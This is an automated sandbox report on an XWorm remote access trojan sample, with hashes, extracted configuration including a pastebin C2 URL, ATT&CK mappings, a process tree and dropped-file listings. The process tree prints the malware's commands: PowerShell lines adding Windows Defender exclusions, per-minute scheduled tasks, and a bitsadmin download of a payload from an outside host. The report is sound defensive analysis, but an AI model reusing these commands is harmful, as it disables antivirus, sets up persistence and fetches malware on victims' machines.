xworm | 71e09355e41f28652a3749b8f109c75eb4e2b80fd2d3d651c420d6b1b73aaa96

Analysis

max time kernel
146s
max time network
149s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
07/03/2025, 22:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

PhantomCrypter.exe
Size

5.2MB
MD5

e877adfe74b6bd2ad9b9f5c73f839152
SHA1

ff73461cd1fc5d9755d8dfa135ed3f6401989d00
SHA256

71e09355e41f28652a3749b8f109c75eb4e2b80fd2d3d651c420d6b1b73aaa96
SHA512

7c0828a3e966dee6e93e8c6797068c1d4b27a9c1b88249381db6028d7ec18b282560a9e215da2f2c9841307c0f1732fea47983107fd606b850386e993f7431d1
SSDEEP

98304:KUJgH4K+NsPeD9k/OYU2HkSBEIHFP2gH4KdBwgH/fkEihw:KUcT+NsPOkeLAVFXTdBwgH/Mr

Score

10^/10

xworm discovery dropper execution persistence rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

Mutex

fSptE7osVO19YSsZ

Attributes

Install_directory
%AppData%
install_file
msedge.exe
pastebin_url
https://pastebin.com/raw/eZa6J63T

aes.plain

Signatures

Detect Xworm Payload 10 IoCs

resource	yara_rule
behavioral1/files/0x0008000000012102-5.dat	family_xworm
behavioral1/memory/2500-7-0x0000000000840000-0x000000000086E000-memory.dmp	family_xworm
behavioral1/files/0x000800000001749c-18.dat	family_xworm
behavioral1/memory/2740-22-0x0000000000390000-0x00000000003BC000-memory.dmp	family_xworm
behavioral1/files/0x0016000000018657-28.dat	family_xworm
behavioral1/files/0x000600000001867d-33.dat	family_xworm
behavioral1/memory/2968-32-0x00000000010A0000-0x00000000010CE000-memory.dmp	family_xworm
behavioral1/memory/2772-35-0x0000000000360000-0x0000000000388000-memory.dmp	family_xworm
behavioral1/memory/2736-163-0x0000000000D50000-0x0000000000D7E000-memory.dmp	family_xworm
behavioral1/memory/2724-170-0x0000000000FA0000-0x0000000000FC8000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 16 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2412	powershell.exe
1600	powershell.exe
2472	powershell.exe
2812	powershell.exe
940	powershell.exe
2544	powershell.exe
2884	powershell.exe
2948	powershell.exe
1808	powershell.exe
1900	powershell.exe
1096	powershell.exe
1940	powershell.exe
2224	powershell.exe
3020	powershell.exe
812	powershell.exe
2588	powershell.exe

Download via BitsAdmin 1 TTPs 1 IoCs

dropper

BITS Jobs

T1197

pid	Process
2628	bitsadmin.exe

Drops startup file 7 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk	msedge.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDrive.lnk	OneDrive.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDrive.lnk	OneDrive.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk	msedge.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk	msedge.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome Update.lnk	Chrome Update.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome Update.lnk	Chrome Update.exe

Executes dropped EXE 10 IoCs

pid	Process
2500	msedge.exe
2148	PhantomCrypters.exe
2740	Chrome Update.exe
2968	msedge.exe
2772	OneDrive.exe
2720	TOPHERC.exe
2548	OneDrive.exe
2736	msedge.exe
1636	msedge.exe
2724	OneDrive.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\ProgramData\\OneDrive.exe"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\Chrome Update = "C:\\Users\\Admin\\AppData\\Roaming\\Chrome Update.exe"	Chrome Update.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs

Web Service

T1102

flow	ioc
16	pastebin.com
17	pastebin.com
10	pastebin.com
11	pastebin.com
12	pastebin.com
13	pastebin.com
14	pastebin.com
15	pastebin.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TOPHERC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bitsadmin.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2016	schtasks.exe
2684	schtasks.exe
344	schtasks.exe
1792	schtasks.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
2412	powershell.exe
1808	powershell.exe
1940	powershell.exe
1900	powershell.exe
2812	powershell.exe
1600	powershell.exe
2544	powershell.exe
940	powershell.exe
2224	powershell.exe
3020	powershell.exe
1096	powershell.exe
812	powershell.exe
2884	powershell.exe
2472	powershell.exe
2588	powershell.exe
2948	powershell.exe
2968	msedge.exe
2772	OneDrive.exe
2500	msedge.exe
2740	Chrome Update.exe

Suspicious use of AdjustPrivilegeToken 28 IoCs

description	pid	Process
Token: SeDebugPrivilege	2500	msedge.exe
Token: SeDebugPrivilege	2740	Chrome Update.exe
Token: SeDebugPrivilege	2968	msedge.exe
Token: SeDebugPrivilege	2772	OneDrive.exe
Token: SeDebugPrivilege	2412	powershell.exe
Token: SeDebugPrivilege	1808	powershell.exe
Token: SeDebugPrivilege	1940	powershell.exe
Token: SeDebugPrivilege	1900	powershell.exe
Token: SeDebugPrivilege	2812	powershell.exe
Token: SeDebugPrivilege	1600	powershell.exe
Token: SeDebugPrivilege	2544	powershell.exe
Token: SeDebugPrivilege	940	powershell.exe
Token: SeDebugPrivilege	2224	powershell.exe
Token: SeDebugPrivilege	3020	powershell.exe
Token: SeDebugPrivilege	1096	powershell.exe
Token: SeDebugPrivilege	812	powershell.exe
Token: SeDebugPrivilege	2884	powershell.exe
Token: SeDebugPrivilege	2472	powershell.exe
Token: SeDebugPrivilege	2588	powershell.exe
Token: SeDebugPrivilege	2948	powershell.exe
Token: SeDebugPrivilege	2968	msedge.exe
Token: SeDebugPrivilege	2772	OneDrive.exe
Token: SeDebugPrivilege	2500	msedge.exe
Token: SeDebugPrivilege	2740	Chrome Update.exe
Token: SeDebugPrivilege	2548	OneDrive.exe
Token: SeDebugPrivilege	2736	msedge.exe
Token: SeDebugPrivilege	1636	msedge.exe
Token: SeDebugPrivilege	2724	OneDrive.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
2968	msedge.exe
2772	OneDrive.exe
2500	msedge.exe
2740	Chrome Update.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1272 wrote to memory of 2500	1272	PhantomCrypter.exe	30
PID 1272 wrote to memory of 2500	1272	PhantomCrypter.exe	30
PID 1272 wrote to memory of 2500	1272	PhantomCrypter.exe	30
PID 1272 wrote to memory of 2148	1272	PhantomCrypter.exe	31
PID 1272 wrote to memory of 2148	1272	PhantomCrypter.exe	31
PID 1272 wrote to memory of 2148	1272	PhantomCrypter.exe	31
PID 2148 wrote to memory of 2740	2148	PhantomCrypters.exe	32
PID 2148 wrote to memory of 2740	2148	PhantomCrypters.exe	32
PID 2148 wrote to memory of 2740	2148	PhantomCrypters.exe	32
PID 2148 wrote to memory of 2688	2148	PhantomCrypters.exe	33
PID 2148 wrote to memory of 2688	2148	PhantomCrypters.exe	33
PID 2148 wrote to memory of 2688	2148	PhantomCrypters.exe	33
PID 2148 wrote to memory of 2688	2148	PhantomCrypters.exe	33
PID 2148 wrote to memory of 2968	2148	PhantomCrypters.exe	34
PID 2148 wrote to memory of 2968	2148	PhantomCrypters.exe	34
PID 2148 wrote to memory of 2968	2148	PhantomCrypters.exe	34
PID 2148 wrote to memory of 2772	2148	PhantomCrypters.exe	35
PID 2148 wrote to memory of 2772	2148	PhantomCrypters.exe	35
PID 2148 wrote to memory of 2772	2148	PhantomCrypters.exe	35
PID 2148 wrote to memory of 2720	2148	PhantomCrypters.exe	36
PID 2148 wrote to memory of 2720	2148	PhantomCrypters.exe	36
PID 2148 wrote to memory of 2720	2148	PhantomCrypters.exe	36
PID 2148 wrote to memory of 2720	2148	PhantomCrypters.exe	36
PID 2688 wrote to memory of 2628	2688	mshta.exe	37
PID 2688 wrote to memory of 2628	2688	mshta.exe	37
PID 2688 wrote to memory of 2628	2688	mshta.exe	37
PID 2688 wrote to memory of 2628	2688	mshta.exe	37
PID 2500 wrote to memory of 2412	2500	msedge.exe	39
PID 2500 wrote to memory of 2412	2500	msedge.exe	39
PID 2500 wrote to memory of 2412	2500	msedge.exe	39
PID 2740 wrote to memory of 1808	2740	Chrome Update.exe	41
PID 2740 wrote to memory of 1808	2740	Chrome Update.exe	41
PID 2740 wrote to memory of 1808	2740	Chrome Update.exe	41
PID 2772 wrote to memory of 1940	2772	OneDrive.exe	43
PID 2772 wrote to memory of 1940	2772	OneDrive.exe	43
PID 2772 wrote to memory of 1940	2772	OneDrive.exe	43
PID 2968 wrote to memory of 1900	2968	msedge.exe	45
PID 2968 wrote to memory of 1900	2968	msedge.exe	45
PID 2968 wrote to memory of 1900	2968	msedge.exe	45
PID 2500 wrote to memory of 2812	2500	msedge.exe	47
PID 2500 wrote to memory of 2812	2500	msedge.exe	47
PID 2500 wrote to memory of 2812	2500	msedge.exe	47
PID 2772 wrote to memory of 1600	2772	OneDrive.exe	49
PID 2772 wrote to memory of 1600	2772	OneDrive.exe	49
PID 2772 wrote to memory of 1600	2772	OneDrive.exe	49
PID 2740 wrote to memory of 940	2740	Chrome Update.exe	51
PID 2740 wrote to memory of 940	2740	Chrome Update.exe	51
PID 2740 wrote to memory of 940	2740	Chrome Update.exe	51
PID 2968 wrote to memory of 2544	2968	msedge.exe	53
PID 2968 wrote to memory of 2544	2968	msedge.exe	53
PID 2968 wrote to memory of 2544	2968	msedge.exe	53
PID 2500 wrote to memory of 2224	2500	msedge.exe	55
PID 2500 wrote to memory of 2224	2500	msedge.exe	55
PID 2500 wrote to memory of 2224	2500	msedge.exe	55
PID 2968 wrote to memory of 3020	2968	msedge.exe	57
PID 2968 wrote to memory of 3020	2968	msedge.exe	57
PID 2968 wrote to memory of 3020	2968	msedge.exe	57
PID 2772 wrote to memory of 1096	2772	OneDrive.exe	58
PID 2772 wrote to memory of 1096	2772	OneDrive.exe	58
PID 2772 wrote to memory of 1096	2772	OneDrive.exe	58
PID 2740 wrote to memory of 812	2740	Chrome Update.exe	61
PID 2740 wrote to memory of 812	2740	Chrome Update.exe	61
PID 2740 wrote to memory of 812	2740	Chrome Update.exe	61
PID 2500 wrote to memory of 2884	2500	msedge.exe	63

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\PhantomCrypter.exe
"C:\Users\Admin\AppData\Local\Temp\PhantomCrypter.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1272
- C:\Users\Admin\AppData\Local\Temp\msedge.exe
  "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2500
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\msedge.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2412
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2812
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\msedge.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2224
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2884
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\Admin\AppData\Roaming\msedge.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2016
- C:\Users\Admin\AppData\Local\Temp\PhantomCrypters.exe
  "C:\Users\Admin\AppData\Local\Temp\PhantomCrypters.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2148
- - C:\Users\Admin\AppData\Roaming\Chrome Update.exe
    "C:\Users\Admin\AppData\Roaming\Chrome Update.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2740
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Chrome Update.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1808
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Chrome Update.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:940
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Chrome Update.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:812
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Chrome Update.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2472
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Chrome Update" /tr "C:\Users\Admin\AppData\Roaming\Chrome Update.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2684
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\DownloaderLuc.hta"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2688
  - - C:\Windows\SysWOW64\bitsadmin.exe
      "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://spyderrock.com/xkdg5397-run.exe C:\Users\Admin\AppData\Local\Temp\Notify.exe
      4⤵
      Download via BitsAdmin
      System Location Discovery: System Language Discovery
      PID:2628
- - C:\Users\Admin\AppData\Roaming\msedge.exe
    "C:\Users\Admin\AppData\Roaming\msedge.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2968
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\msedge.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1900
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2544
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\msedge.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3020
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2588
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\Admin\AppData\Local\msedge.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:344
- - C:\Users\Admin\AppData\Roaming\OneDrive.exe
    "C:\Users\Admin\AppData\Roaming\OneDrive.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2772
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\OneDrive.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1940
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'OneDrive.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1600
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\OneDrive.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1096
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'OneDrive.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2948
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "OneDrive" /tr "C:\ProgramData\OneDrive.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1792
- - C:\Users\Admin\AppData\Roaming\TOPHERC.exe
    "C:\Users\Admin\AppData\Roaming\TOPHERC.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2720

C:\Windows\system32\taskeng.exe
taskeng.exe {5BDB0FDA-A76D-48BE-87DD-CC14B48377A6} S-1-5-21-312935884-697965778-3955649944-1000:MXQFNXLT\Admin:Interactive:[1]
1⤵
PID:2012
- C:\ProgramData\OneDrive.exe
  C:\ProgramData\OneDrive.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2548
- C:\Users\Admin\AppData\Local\msedge.exe
  C:\Users\Admin\AppData\Local\msedge.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2736
- C:\ProgramData\OneDrive.exe
  C:\ProgramData\OneDrive.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2724
- C:\Users\Admin\AppData\Local\msedge.exe
  C:\Users\Admin\AppData\Local\msedge.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1636

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

BITS Jobs

T1197

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

BITS Jobs

T1197

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\PhantomCrypters.exe

Filesize
5.0MB

MD5
d4d28f2c6fd9af9ee5a3be30f9ab913b

SHA1
be4264bceaff957ff799b73ebc2479f0fc794815

SHA256
c69d8df82357c95fe43db40465d0169ea8e0feacd8a3e4debe87865544100d9e

SHA512
7eed5b6d3420c930a07aee500e086ec61fd33099cd641a2efe7664081c0e5fdab4d1ad2b4835edcbe3e6722d44e60a75119a2900cfd00b7c182b20f379d7a977

Download Submit
C:\Users\Admin\AppData\Local\Temp\msedge.exe

Filesize
165KB

MD5
8c92b315d88907a31ad9eaa934a60660

SHA1
89c26c8a1f5b2db85e628a6526c9431e7febe5f8

SHA256
bea75b57f940b13d5bfcb05a0c3ae1def9d2d25f6c3115fc7b2bf85232175672

SHA512
b294fd15ac63bbd7cfd444c9df5a03c7bce8bc98d2b2d2011e5290638fba689ff083260ed60688cc4b0a0a59299dda0b1cc09ba8f63daf92efbeeaed604ebfc2

Download Submit
C:\Users\Admin\AppData\Roaming\Chrome Update.exe

Filesize
152KB

MD5
16cdd301591c6af35a03cd18caee2e59

SHA1
92c6575b57eac309c8664d4ac76d87f2906e8ef3

SHA256
11d55ac2f9070a70d12f760e9a6ee75136eca4bf711042acc25828ddda3582c8

SHA512
a44402e5e233cb983f7cfd9b81bc542a08d8092ffa4bd970fc25fe112355643506d5dfee0dd76f2e79b983df0fde67bfc50aabb477492a7596e38081e4083476

Download Submit
C:\Users\Admin\AppData\Roaming\DownloaderLuc.hta

Filesize
844B

MD5
3f8a283abe6fe28a7d217c8105041426

SHA1
0283cd67e7cc0a99eeae3c3dea69716a6ac75bb1

SHA256
333c439c84ccbcab11dd9cc7f4d90596c5b65caf1164e8a908e61aa0222916b1

SHA512
bc5f8f256356c689953516877f8b7895fb1efe587feabdddf0e1524d0b22e3dcb89e0e654d19d0c314c6a376a0e7594965178a353d147ea98c43d3d5976f1846

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7TD7B8KFKFNQLM72V5OD.temp

Filesize
7KB

MD5
654003140d084066c0cde1617a926740

SHA1
76d281f9ecda92b7084684b21a9856c1483735a1

SHA256
180b10de96611e2d50f86b0224c0983e2e6360ba3fa6fe845648d7c4c27d9289

SHA512
0ea4ffe7b6eb0d67fb12e1494b0bf364dd1874220ebb145bfb09103b64ccd975ee077d9681398de876e82ac0b4c30e0906c1983f5a527b6b8a1a45087ce26753

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk

Filesize
687B

MD5
9320ed2fc99bc38b64917bdbf87141f4

SHA1
c8db6e4ce931077d8520e6a4702077643d18ab7d

SHA256
5e5e16a1b64b42eb4367a808e192e17bf8b6414c7e1400f907dcf80a9a005e05

SHA512
9571646ebc8af2695a25e8ecb0d82a19be4d2eee7b30dbc09da1bbcc9fd29835a1f6affcf13204ed5c501017672d949e56885bfcb5dd7d338f5762a37c12e9b2

Download Submit
C:\Users\Admin\AppData\Roaming\OneDrive.exe

Filesize
140KB

MD5
a1cd6f4a3a37ed83515aa4752f98eb1d

SHA1
7f787c8d72787d8d130b4788b006b799167d1802

SHA256
5cbcc0a0c1d74cd54ac999717b0ff0607fe6ed02cca0a3e0433dd94783cfec65

SHA512
9489287e0b4925345fee05fe2f6e6f12440af1425ef397145e32e6f80c7ae98b530e42002d92dc156643f9829bc8a3b969e855cecd2265b6616c4514eed00355

Download Submit
C:\Users\Admin\AppData\Roaming\TOPHERC.exe

Filesize
4.2MB

MD5
79f2fd33a188ff47216b4f4dd4552582

SHA1
16e40e0a1fed903fec20cd6cd600e3a2548881ad

SHA256
cc45d38fa00c5aeb33bdf842166460117b5e70b0b4fcf5bb6ef9747ec0b0575f

SHA512
caa33702fdc7e480a6093d2af035f860044a4e960fd6e5a4b91d6019f2c3d4c235d9e95734e6b54ea2a88af4e96bf72a54d81b2a70c1f64e76dcd202891905f2

Download Submit
C:\Users\Admin\AppData\Roaming\msedge.exe

Filesize
166KB

MD5
aee20d80f94ae0885bb2cabadb78efc9

SHA1
1e82eba032fcb0b89e1fdf937a79133a5057d0a1

SHA256
498eb55b3fb4c4859ee763a721870bb60ecd57e99f66023b69d8a258efa3af7d

SHA512
3a05ff32b9aa79092578c09dfe67eaca23c6fe8383111dab05117f39d91f27670029f39482827d191bd6a652483202b8fc1813f8d5a0f3f73fd35ca37a4f6d42

Download Submit
memory/1272-0-0x000007FEF5D13000-0x000007FEF5D14000-memory.dmp

Filesize
4KB

Download
memory/1272-1-0x00000000011F0000-0x0000000001726000-memory.dmp

Filesize
5.2MB

Download
memory/1600-75-0x000000001B670000-0x000000001B952000-memory.dmp

Filesize
2.9MB

Download
memory/1600-81-0x00000000027F0000-0x00000000027F8000-memory.dmp

Filesize
32KB

Download
memory/2148-13-0x0000000000BF0000-0x00000000010F8000-memory.dmp

Filesize
5.0MB

Download
memory/2412-48-0x0000000001F70000-0x0000000001F78000-memory.dmp

Filesize
32KB

Download
memory/2412-47-0x000000001B670000-0x000000001B952000-memory.dmp

Filesize
2.9MB

Download
memory/2500-155-0x000007FEF5D10000-0x000007FEF66FC000-memory.dmp

Filesize
9.9MB

Download
memory/2500-7-0x0000000000840000-0x000000000086E000-memory.dmp

Filesize
184KB

Download
memory/2500-133-0x000007FEF5D10000-0x000007FEF66FC000-memory.dmp

Filesize
9.9MB

Download
memory/2500-15-0x000007FEF5D10000-0x000007FEF66FC000-memory.dmp

Filesize
9.9MB

Download
memory/2500-156-0x000007FEF5D10000-0x000007FEF66FC000-memory.dmp

Filesize
9.9MB

Download
memory/2720-42-0x0000000000E40000-0x0000000001278000-memory.dmp

Filesize
4.2MB

Download
memory/2724-170-0x0000000000FA0000-0x0000000000FC8000-memory.dmp

Filesize
160KB

Download
memory/2736-163-0x0000000000D50000-0x0000000000D7E000-memory.dmp

Filesize
184KB

Download
memory/2740-22-0x0000000000390000-0x00000000003BC000-memory.dmp

Filesize
176KB

Download
memory/2772-35-0x0000000000360000-0x0000000000388000-memory.dmp

Filesize
160KB

Download
memory/2968-32-0x00000000010A0000-0x00000000010CE000-memory.dmp

